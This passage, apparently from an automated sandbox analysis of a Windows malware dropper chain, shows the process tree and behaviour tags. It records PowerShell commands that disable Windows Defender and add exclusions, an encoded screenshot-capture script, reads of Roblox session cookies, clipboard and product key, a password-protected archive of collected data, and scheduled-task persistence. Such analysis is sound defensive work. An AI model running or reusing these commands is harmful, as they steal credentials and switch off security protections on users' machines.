kelyBT9.exe 133 PID 3532 wrote to memory of 2124 3532 kelyBT9.exe 133 PID 1076 wrote to memory of 3120 1076 skotes.exe 135 PID 1076 wrote to memory of 3120 1076 skotes.exe 135 PID 1076 wrote to memory of 3120 1076 skotes.exe 135 PID 740 wrote to memory of 2760 740 based.exe 136 PID 740 wrote to memory of 2760 740 based.exe 136 PID 740 wrote to memory of 5044 740 based.exe 137 PID 740 wrote to memory of 5044 740 based.exe 137 PID 740 wrote to memory of 3020 740 based.exe 138 PID 740 wrote to memory of 3020 740 based.exe 138 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe"C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4284 -
C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe"C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI42842\Build.exe -pbeznogym5⤵
- Suspicious use of WriteProcessMemory
PID:1208 -
C:\Users\Admin\AppData\Local\Temp\_MEI42842\Build.exeC:\Users\Admin\AppData\Local\Temp\_MEI42842\Build.exe -pbeznogym6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\ProgramData\Microsoft\hacn.exe"C:\ProgramData\Microsoft\hacn.exe"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\ProgramData\Microsoft\hacn.exe"C:\ProgramData\Microsoft\hacn.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI30962\Build.exe -pbeznogym9⤵
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Users\Admin\AppData\Local\Temp\_MEI30962\Build.exeC:\Users\Admin\AppData\Local\Temp\_MEI30962\Build.exe -pbeznogym10⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\ProgramData\Microsoft\hacn.exe"C:\ProgramData\Microsoft\hacn.exe"11⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:664 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI30962\Build.exe -pbeznogym12⤵PID:4844
-
C:\Users\Admin\AppData\Local\Temp\_MEI30962\Build.exeC:\Users\Admin\AppData\Local\Temp\_MEI30962\Build.exe -pbeznogym13⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2928 -
C:\ProgramData\Microsoft\hacn.exe"C:\ProgramData\Microsoft\hacn.exe"14⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5204
-
-
C:\ProgramData\Microsoft\based.exe"C:\ProgramData\Microsoft\based.exe"14⤵
- Executes dropped EXE
PID:5244 -
C:\ProgramData\Microsoft\based.exe"C:\ProgramData\Microsoft\based.exe"15⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5508
-
-
-
-
-
-
C:\ProgramData\Microsoft\based.exe"C:\ProgramData\Microsoft\based.exe"11⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\ProgramData\Microsoft\based.exe"C:\ProgramData\Microsoft\based.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1392
-
-
-
-
-
-
-
C:\ProgramData\Microsoft\based.exe"C:\ProgramData\Microsoft\based.exe"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4032 -
C:\ProgramData\Microsoft\based.exe"C:\ProgramData\Microsoft\based.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"9⤵
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"9⤵
- Suspicious use of WriteProcessMemory
PID:1216 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ​  .scr'"9⤵
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ​  .scr'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"9⤵PID:3488
-
C:\Windows\system32\tasklist.exetasklist /FO LIST10⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"9⤵PID:3576
-
C:\Windows\system32\tasklist.exetasklist /FO LIST10⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"9⤵PID:2760
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName10⤵
- Suspicious use of AdjustPrivilegeToken
PID:5660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"9⤵
- Clipboard Data
PID:5044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard10⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"9⤵PID:3020
-
C:\Windows\system32\tasklist.exetasklist /FO LIST10⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"9⤵PID:3824
-
C:\Windows\system32\tree.comtree /A /F10⤵PID:5676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"9⤵PID:4652
-
C:\Windows\system32\systeminfo.exesysteminfo10⤵
- Gathers system information
PID:5696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="9⤵PID:4860
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=10⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5688 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oeevtdbd\oeevtdbd.cmdline"11⤵PID:3448
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES38BE.tmp" "c:\Users\Admin\AppData\Local\Temp\oeevtdbd\CSC62E6975524324254B2BDFE875B142F60.TMP"12⤵PID:5664
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"9⤵PID:6136
-
C:\Windows\system32\tree.comtree /A /F10⤵PID:5600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"9⤵PID:6012
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"9⤵PID:376
-
C:\Windows\system32\tree.comtree /A /F10⤵PID:212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"9⤵PID:5184
-
C:\Windows\system32\tree.comtree /A /F10⤵PID:5444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"9⤵PID:5936
-
C:\Windows\system32\tree.comtree /A /F10⤵PID:5408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"9⤵PID:3572
-
C:\Windows\system32\tree.comtree /A /F10⤵PID:4124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"9⤵PID:5264
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY10⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5616
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"9⤵PID:5168
-
C:\Windows\system32\getmac.exegetmac10⤵PID:1152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI40322\rar.exe a -r -hp"dxl1234" "C:\Users\Admin\AppData\Local\Temp\T0M4b.zip" *"9⤵PID:5600
-
C:\Users\Admin\AppData\Local\Temp\_MEI40322\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI40322\rar.exe a -r -hp"dxl1234" "C:\Users\Admin\AppData\Local\Temp\T0M4b.zip" *10⤵
- Executes dropped EXE
PID:2684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"9⤵PID:5484
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption10⤵
- Suspicious use of AdjustPrivilegeToken
PID:6076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"9⤵PID:5492
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory10⤵PID:5688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"9⤵PID:3428
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid10⤵PID:5704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"9⤵PID:5380
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"9⤵PID:1640
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name10⤵
- Detects videocard installed
PID:5636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"9⤵PID:5840
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault10⤵
- Suspicious behavior: EnumeratesProcesses
PID:6064
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1013267001\kelyBT9.exe"C:\Users\Admin\AppData\Local\Temp\1013267001\kelyBT9.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "SecurityHealthSystray.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\SecurityHealthSystray.exe" /rl HIGHEST /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2124
-
-
-
C:\Users\Admin\AppData\Local\Temp\1013272001\bd3fd12845.exe"C:\Users\Admin\AppData\Local\Temp\1013272001\bd3fd12845.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3120 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 15084⤵
- Program crash
PID:5208
-
-
-
C:\Users\Admin\AppData\Local\Temp\1013273001\e3cc36291d.exe"C:\Users\Admin\AppData\Local\Temp\1013273001\e3cc36291d.exe"3⤵
